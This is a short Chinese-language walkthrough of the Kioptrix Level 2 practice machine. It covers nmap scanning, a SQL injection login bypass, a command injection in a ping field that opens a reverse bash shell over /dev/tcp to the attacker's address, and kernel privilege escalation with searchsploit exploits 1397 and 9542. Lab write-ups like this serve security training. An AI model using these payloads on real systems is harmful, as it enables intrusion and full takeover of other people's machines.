Kioptrix Level 2靶机
一、信息搜集
1.主机发现
namp -sP 192.168.189.129/24 -T5
2.全端口扫描,服务版本探测
nmap -sS -sV -p- 192.168.189.135
发现80端口存在http服务,我们尝试访问
二、漏洞利用
1、万能密码登录
发现一个登陆页面,发现万能密码可以绕过登陆验证
' or 1=1 #
查看源代码发现html页面不完整:
我们手动修补后发现了一个ping的功能,且存在命令执行,但是没有找到nc,我们反弹一个bash回来:
2、反弹shell
127.0.0.1 | bash -c 'exec bash -i &>/dev/tcp/192.168.189.129/5566 <&1'
三、后渗透
1.信息搜集
查看内核版本信息,搜索历史漏洞
uname -a
lsb_release -a # 查看版本信息
searchsploit 2.6.9 linux | grep Privilege
searchsploit centos 4.5 | grep Privilege
发现可利用的提权exp:编号1397,9542
2.权限提升
[!NOTE]
kali中的gcc版本太高可能无法编译成功,我们可将源码下载到目标机器进行编译
开启微服务:
python -m http.server
/tmp目录有读写执行权限,下载到这个目录
编译:
gcc -o k-rad3 1397.c -static -O2
执行后提示失败,内核版本不匹配!
我们尝试编号9542:
提权成功!